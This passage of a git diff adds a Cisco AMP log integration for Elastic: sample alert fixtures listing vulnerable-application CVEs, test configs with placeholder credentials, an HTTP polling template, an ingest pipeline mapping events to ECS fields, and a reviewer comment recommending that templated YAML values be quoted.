f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", + "kind": "alert", + "start": "2020-12-25T05:02:26.000Z", + "action": "Vulnerable Application Detected", + "id": "15193384371995", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ], + "cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ] + }, + "vulnerabilities": [ + { + "name": "Microsoft 
Internet Explorer", + "score": "7.6", + "cve": "CVE-2018-0762", + "version": "11", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762" + }, + { + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772", + "cve": "CVE-2018-0772" + } + ], + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296279 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243" + } + }, + "@timestamp": "2020-12-25T04:32:53.000Z", + "file": { + "name": "OUTLOOK.EXE", + "hash": { + "sha256": "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "hash": [ + "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel" + }, + "event": { + "severity": 1, + "ingested": "2021-09-12T17:32:35.701421764Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application 
Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", + "kind": "alert", + "start": "2020-12-25T04:32:53.000Z", + "action": "Vulnerable Application Detected", + 
"id": "15193366641599", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ], + "cve": [ + "CVE-2017-0106", + "CVE-2017-11774", + "CVE-2017-8506", + "CVE-2017-8507", + "CVE-2017-8571", + "CVE-2017-8663", + "CVE-2018-0791" + ] + }, + "vulnerabilities": [ + { + "name": "Microsoft Office", + "score": "9.3", + "cve": "CVE-2017-0106", + "version": "2016", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106" + }, + { + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774", + "cve": "CVE-2017-11774" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506", + "cve": "CVE-2017-8506" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507", + "cve": "CVE-2017-8507" + }, + { + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571", + "cve": "CVE-2017-8571" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663", + "cve": "CVE-2017-8663" + }, + { + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791", + "cve": "CVE-2018-0791" + } + ], + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296279 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2020-12-25T04:22:45.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": 
"Demo_AMP_Intel" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:32:35.701423630Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": "6525498672153625000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2020-12-25T04:07:21.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel" + }, + "event": { + "severity": 0, + "action": "Scan 
Completed, No Detections", + "ingested": "2021-09-12T17:32:35.701425510Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", + "id": "6525494703603843000", + "kind": "alert" + }, + "cisco": { + "amp": { + "scan": { + "scanned_paths": 0, + "malicious_detections": 0, + "description": "Flash Scan", + "clean": true, + "scanned_files": 2872, + "scanned_processes": 49 + }, + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 554696715 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": 
"2020-12-25T04:06:40.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Intel" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Intel", + "hostname": "Demo_AMP_Intel" + }, + "event": { + "severity": 0, + "action": "Scan Started", + "ingested": "2021-09-12T17:32:35.701427375Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", + "id": "6525494527510184000", + "kind": "alert" + }, + "cisco": { + "amp": { + "scan": { + "description": "Flash Scan" + }, + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "e6:44:a0:56:f3:9a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "e6:44:a0:56:f3:9a" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 554696714 + } + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No 
newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..5622947e4b8
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,5 @@
+dynamic_fields:
+ event.ingested: ".*"
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml b/packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml
new file mode 100644
index 00000000000..1d250dd622a
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/system/test-default-config.yml
@@ -0,0 +1,10 @@
+input: httpjson
+service: amp
+vars: ~
+data_stream:
+ vars:
+ preserve_original_event: true
+ url: http://{{Hostname}}:{{Port}}/v1/events?offset=0&limit=300
+ client_id: abcd-abcd
+ api_key: xxxxxxxxxx
+ ssl.verification_mode: none
diff --git a/packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs b/packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs
new file mode 100644
index 00000000000..8f53b5ff95f
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/agent/stream/httpjson.yml.hbs
@@ -0,0 +1,71 @@
+config_version: "2"
+interval: {{interval}}
+request.method: "GET"
+request.url: {{ url }}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+auth.basic.user: {{ client_id }}
+auth.basic.password: {{ api_key }}
+
+request.transforms:
+- set:
+ target: url.params.start_date
+ value: '[[.cursor.timestamp]]'
+ default: '[[ formatDate (now (parseDuration "-{{ initial_interval }}")) "2006-01-02T15:04:05-07:00" ]]'
+- set:
+ target: url.params.limit
+ value: {{ limit }}
+
+request.rate_limit.limit: '[[ .last_response.header.Get "X-RateLimit-Limit" ]]'
+request.rate_limit.reset: '[[ .last_response.header.Get "X-RateLimit-Reset" ]]'
+request.rate_limit.remaining: '[[ .last_response.header.Get "X-RateLimit-Remaining" ]]'
+
+response.split:
+ target: body.data
+ keep_parent: true
+
+response.pagination:
+- set:
+ target: url.value
+ value: '[[ .last_response.body.metadata.links.next ]]'
+
+cursor:
+ timestamp:
+ value: '[[ .first_event.data.date ]]'
+
+{{#if tags.length}}
+tags:
+{{else if preserve_original_event}}
+tags:
+{{/if}}
+{{#each tags as |tag i|}}
+ - {{tag}}
+{{/each}}
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#contains tags "forwarded"}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+
+processors:
+ - decode_json_fields:
+ fields: [message]
+ target: json
+ - fingerprint:
+ fields:
+ - "json.data.timestamp"
+ - "json.data.timestamp_nanoseconds"
+ - "json.data.event_type_id"
+ - "json.data.connector_guid"
+ - "json.data.id"
+ - "json.data.detection_id"
+ target_field: "@metadata._id"
+ ignore_missing: true
+{{#if processors}}
+{{processors}}
+{{/if}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..8d326db7306
--- /dev/null
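Review bot: The templated scalars `request.url: {{ url }}`, `auth.basic.user: {{ client_id }}` and `auth.basic.password: {{ api_key }}` are rendered unquoted, so a credential or URL containing ` #` or `: `, or starting with `*`, `&` or `[`, breaks the rendered YAML or silently changes its type, and an empty value becomes `null` rather than an empty string. Quote them the way the `request.rate_limit.*` lines already are: `request.url: "{{ url }}"`, `auth.basic.user: "{{ client_id }}"`, `auth.basic.password: "{{ api_key }}"`. The same consideration applies to `value: {{ limit }}` in the transform; whether it is declared as a number or a string is set in the manifest, which is not visible here, and quoting is safe either way since it is sent as a URL parameter.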
+++ b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml 
@@ -0,0 +1,475 @@
+---
+description: Pipeline for parsing Cisco AMP logs
+processors:
+- rename:
+ field: message
+ target_field: event.original
+ ignore_missing: true
+- json:
+ field: event.original
+ target_field: json
+ if: ctx?.json == null
+#########################
+## ECS General Mapping ##
+#########################
+- rename:
+ field: json.data
+ target_field: cisco.amp
+ ignore_missing: true
+- remove:
+ field:
+ - "@timestamp"
+ ignore_missing: true
+ if: ctx?.cisco?.amp?.timestamp != null
+- date:
+ field: cisco.amp.timestamp
+ formats:
+ - UNIX
+ ignore_failure: true
+
+#######################
+## ECS Event Mapping ##
+#######################
+- set:
+ field: event.ingested
+ value: '{{_ingest.timestamp}}'
+- set:
+ field: ecs.version
+ value: '1.11.0'
+- set:
+ field: event.kind
+ value: alert
+- convert:
+ field: cisco.amp.id
+ target_field: event.id
+ type: string
+ ignore_missing: true
+- append:
+ field: event.category
+ value: file
+ if: ctx?.cisco?.amp?.file?.file_name != null
+- append:
+ field: event.category
+ value: malware
+ if: 'ctx?.cisco?.amp?.file?.disposition == "Malicious"'
+- rename:
+ field: cisco.amp.event_type
+ target_field: event.action
+ ignore_missing: true
+- set:
+ field: event.severity
+ value: 1
+ if: ctx?.cisco?.amp?.severity == 'Low'
+- set:
+ field: event.severity
+ value: 2
+ if: ctx?.cisco?.amp?.severity == 'Medium'
+- set:
+ field: event.severity
+ value: 3
+ if: ctx?.cisco?.amp?.severity == 'High'
+- set:
+ field: event.severity
+ value: 4
+ if: ctx?.cisco?.amp?.severity == 'Critical'
+- set:
+ field: event.severity
+ value: 0
+ if: ctx?.cisco?.amp?.severity == null
+- date:
+ field: cisco.amp.start_timestamp
+ target_field: event.start
+ formats:
+ - UNIX
+ ignore_failure: true
+ if: ctx?.cisco?.amp?.start_timestamp != null
+
+- rename:
+ field: cisco.amp.techniques
+ target_field: cisco.amp.mitre_techniques
+ if: "ctx?.cisco?.amp?.techniques != null && ctx?.cisco?.amp?.techniques.length > 0 && ctx?.cisco?.amp?.techniques[0] instanceof String"
+- rename:
+ field: cisco.amp.tactics
+ target_field: cisco.amp.mitre_tactics
+ if: "ctx?.cisco?.amp?.tactics != null && ctx?.cisco?.amp?.tactics.length > 0 && ctx?.cisco?.amp?.tactics[0] instanceof String"
+
+######################
+## ECS Host Mapping ##
+######################
+- rename:
+ field: cisco.amp.computer.hostname
+ target_field: host.name
+ ignore_missing: true
+- set:
+ field: host.hostname
+ value: "{{ host.name }}"
+ if: ctx?.host?.name != null
+- rename:
+ field: cisco.amp.computer.user
+ target_field: host.user.name
+ ignore_missing: true
+
+#########################
+## ECS Network Mapping ##
+#########################
+- rename:
+ field: cisco.amp.network_info.nfm.protocol
+ target_field: network.transport
+ ignore_missing: true
+- set:
+ field: network.direction
+ value: egress
+ if: "ctx?.cisco?.amp?.network_info?.nfm?.direction == 'Outgoing connection from'"
+- set:
+ field: network.direction
+ value: ingress
+ if: "ctx?.cisco?.amp?.network_info?.nfm?.direction != null && ctx?.cisco?.amp?.network_info?.nfm?.direction != 'Outgoing connection from'"
+
+#####################
+## ECS URL Mapping ##
+#####################
+- uri_parts:
+ field: cisco.amp.network_info.dirty_url
+ target_field: url
+ keep_original: true
+ remove_if_successful: true
+ if: ctx?.cisco?.amp?.network_info?.dirty_url != null
+- rename:
+ field: cisco.amp.network_info.dirty_url
+ target_field: url.original
+ ignore_missing: true
+
+########################
+## ECS Source Mapping ##
+########################
+- rename:
+ field: cisco.amp.network_info.local_ip
+ target_field: source.ip
+ ignore_missing: true
+- rename:
+ field: cisco.amp.network_info.local_port
+ target_field: source.port
+ ignore_missing: true
+
+#############################
+## ECS Destination Mapping ##
+#############################
+- rename:
+ field: cisco.amp.network_info.remote_ip
+ target_field: destination.ip
+ ignore_missing: true
+- rename:
+ field: cisco.amp.network_info.remote_port
+ target_field: destination.port
+ ignore_missing: true
+
+######################
+## ECS File Mapping ##
+######################
+- rename:
+ field: cisco.amp.file.file_name
+ target_field: file.name
+ ignore_missing: true
+- rename:
+ field: cisco.amp.file.file_path
+ target_field: file.path
+ ignore_missing: true
+- rename:
+ field: cisco.amp.file.identity.sha256
+ target_field: file.hash.sha256
+ ignore_missing: true
+- rename:
+ field: cisco.amp.file.identity.sha1
+ target_field: file.hash.sha1
+ ignore_missing: true
+- rename:
+ field: cisco.amp.file.identity.md5
+ target_field: file.hash.md5
+ ignore_missing: true
+
+#####################
+## ECS OS Mapping ##
+#####################
+- set:
+ field: host.os.family
+ value: windows
+ if: 'ctx?.file?.path != null && ctx?.file?.path.contains("\\\\")'
+- set:
+ field: host.os.platform
+ value: windows
+ if: 'ctx?.file?.path != null && ctx?.file?.path.contains("\\\\")'
+
+#########################
+## ECS Process Mapping ##
+#########################
+- rename:
+ field: cisco.amp.file.parent.process_id
+ target_field: process.pid
+ ignore_missing: true
+- rename:
+ field: cisco.amp.network_info.parent.process_id
+ target_field: process.pid
+ ignore_missing: true
+- rename:
+ field: cisco.amp.file.parent.file_name
+ target_field: process.name
+ ignore_missing: true
+- rename:
+ field: cisco.amp.file.parent.identity.sha256
+ target_field: process.hash.sha256
+ ignore_missing: true
+- rename:
+ field: cisco.amp.file.parent.identity.sha1
+ target_field: process.hash.sha1
+ ignore_missing: true
+- rename:
+ field: cisco.amp.file.parent.identity.md5
+ target_field: process.hash.md5
+ ignore_missing: true
+- rename:
+ field: cisco.amp.file.parent.identity.md5
+ target_field: process.hash.md5
+ ignore_missing: true
+- rename:
+ field: cisco.amp.network_info.parent.file_name
+ target_field: process.name
+ ignore_missing: true
+- rename:
+ field: cisco.amp.network_info.parent.identity.sha256
+ target_field: process.hash.sha256
+ ignore_missing: true
+- rename:
+ field: cisco.amp.network_info.parent.identity.sha1
+ target_field: process.hash.sha1
+ ignore_missing: true
+- rename:
+ field: cisco.amp.network_info.parent.identity.md5
+ target_field: process.hash.md5
+ ignore_missing: true
+
+#########################
+## ECS Related Mapping ##
+#########################
+- append:
+ field: related.user
+ value: "{{ host.user.name }}"
+ if: ctx?.host?.user?.name != null
+ allow_duplicates: false
+- append:
+ field: related.hash
+ value: "{{ process.hash.sha256 }}"
+ if: ctx?.process?.parent?.hash?.sha256 != null
+ allow_duplicates: false
+- append:
+ field: related.hash
+ value: "{{ process.hash.md5 }}"
+ if: ctx?.process?.parent?.hash?.md5 != null
+ allow_duplicates: false
+- append:
+ field: related.hash
+ value: "{{ process.hash.sha1 }}"
+ if: ctx?.process?.parent?.hash?.sha1 != null
+ allow_duplicates: false
+- append:
+ field: related.hash
+ value: "{{ file.hash.sha256 }}"
+ if: ctx?.file?.hash?.sha256 != null
+ allow_duplicates: false
+- append:
+ field: related.hash
+ value: "{{ file.hash.md5 }}"
+ if: ctx?.file?.hash?.md5 != null
+ allow_duplicates: false
+- append:
+ field: related.hash
+ value: "{{ file.hash.sha1 }}"
+ if: ctx?.file?.hash?.sha1 != null
+ allow_duplicates: false
+- append:
+ field: related.hash
+ value: "{{ cisco.amp.network_info.parent.identity.sha256 }}"
+ if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha256 != null
+ allow_duplicates: false
+- append:
+ field: related.hash
+ value: "{{ cisco.amp.network_info.parent.identity.md5 }}"
+ if: ctx?.cisco?.amp?.network_info?.parent?.identity?.md5 != null
+ allow_duplicates: false
+- append:
+ field: related.hash
+ value: "{{ cisco.amp.network_info.parent.identity.sha1 }}"
+ if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha1 != null
+ allow_duplicates: false
+- append:
+ field: related.hosts
+ value: "{{ host.name }}"
+ if: ctx?.host?.name != null
+ allow_duplicates: false
+- append:
+ field: related.ip
+ value: "{{ source.ip }}"
+ if: ctx?.source?.ip != null
+ allow_duplicates: false
+- append:
+ field: related.ip
+ value: "{{ destination.ip }}"
+ if: ctx?.destination?.ip != null
+ allow_duplicates: false
+- append:
+ field: related.ip
+ value: "{{ cisco.amp.computer.external_ip }}"
+ if: ctx?.cisco?.amp?.computer?.external_ip != null
+ allow_duplicates: false
+- script:
+ lang: painless
+ source: |
+ if (ctx?.related == null) {
+ ctx.related = new HashMap();
+ }
+ if (ctx?.related?.ip == null) {
+ ctx.related.ip = new ArrayList();
+ }
+ for (addr in ctx?.cisco?.amp?.computer?.network_addresses) {
+ if (addr.ip != null && !addr.ip.isEmpty()) {
+ if (!ctx?.related?.ip.contains(addr.ip)) {
+ ctx?.related?.ip.add(addr.ip);
+ }
+ }
+ }
+ if: ctx?.cisco?.amp?.computer?.network_addresses != null
+- script:
+ lang: painless
+ source: |
+ if (ctx?.cisco?.amp?.related == null) {
+ ctx.cisco.amp.related = new HashMap();
+ }
+ if (ctx?.cisco?.amp?.related?.mac == null) {
+ ctx.cisco.amp.related.mac = new ArrayList();
+ }
+ for (addr in ctx?.cisco?.amp?.computer?.network_addresses) {
+ if (addr.mac != null && !addr.mac.isEmpty()) {
+ if (!ctx?.cisco?.amp?.related?.mac.contains(addr.mac)) {
+ ctx?.cisco?.amp?.related?.mac.add(addr.mac);
+ }
+ }
+ }
+ if: ctx?.cisco?.amp?.computer?.network_addresses != null
+- foreach:
+ field: cisco.amp.vulnerabilities
+ processor:
+ append:
+ field: cisco.amp.related.cve
+ value: "{{ _ingest._value.cve }}"
+ allow_duplicates: false
+ if: ctx?.cisco?.amp?.vulnerabilities != null
+
+#############
+## GeoIP ##
+#############
+- geoip:
+ field: source.ip
+ target_field: source.geo
+ ignore_missing: true
+ if: "ctx.source?.geo == null"
+- geoip:
+ field: destination.ip
+ target_field: destination.geo
+ ignore_missing: true
+ if: "ctx.destination?.geo == null"
+- geoip:
+ database_file: GeoLite2-ASN.mmdb
+ field: source.ip
+ target_field: source.as
+ properties:
+ - asn
+ - organization_name
+ ignore_missing: true
+- geoip:
+ database_file: GeoLite2-ASN.mmdb
+ field: destination.ip
+ target_field: destination.as
+ properties:
+ - asn
+ - organization_name
+ ignore_missing: true
+- rename:
+ field: source.as.asn
+ target_field: source.as.number
+ ignore_missing: true
+- rename:
+ field: source.as.organization_name
+ target_field: source.as.organization.name
+ ignore_missing: true
+- rename:
+ field: destination.as.asn
+ target_field: destination.as.number
+ ignore_missing: true
+- rename:
+ field: destination.as.organization_name
+ target_field: destination.as.organization.name
+ ignore_missing: true
+
+#############
+## Cleanup ##
+#############
+- date:
+ field: cisco.amp.threat_hunting.incident_start_time
+ target_field: cisco.amp.threat_hunting.incident_start_time
+ formats:
+ - UNIX
+ ignore_failure: true
+ if: ctx?.cisco?.amp?.threat_hunting?.incident_start_time != null
+- date:
+ field: cisco.amp.threat_hunting.incident_end_time
+ target_field: cisco.amp.threat_hunting.incident_end_time
+ formats:
+ - UNIX
+ ignore_failure: true
+ if: ctx?.cisco?.amp?.threat_hunting?.incident_end_time != null
+- script:
+ lang: painless
+ description: This script processor iterates over the whole document to remove fields with null values.
+ if: ctx?.json != null
+ source: |
+ void handleMap(Map map) {
+ for (def x : map.values()) {
+ if (x instanceof Map) {
+ handleMap(x);
+ } else if (x instanceof List) {
+ handleList(x);
+ }
+ }
+ map.values().removeIf(v -> v == null);
+ }
+ void handleList(List list) {
+ for (def x : list) {
+ if (x instanceof Map) {
+ handleMap(x);
+ } else if (x instanceof List) {
+ handleList(x);
+ }
+ }
+ }
+ handleMap(ctx);
+- remove:
+ field: event.original
+ if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ ignore_failure: true
+ ignore_missing: true
+- remove:
+ field:
+ - cisco.amp.timestamp
+ - cisco.amp.computer.links
+ - json
+ - cisco.amp.severity
+ - cisco.amp.start_timestamp
+ - cisco.amp.date
+ - cisco.amp.timestamp_nanoseconds
+ - cisco.amp.start_date
+ - cisco.amp.id
+ ignore_missing: true
+on_failure:
+- set:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
+
diff --git a/packages/cisco_amp/data_stream/log/fields/agent.yml b/packages/cisco_amp/data_stream/log/fields/agent.yml
new file mode 100644
index 00000000000..da4e652c53b
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/fields/agent.yml
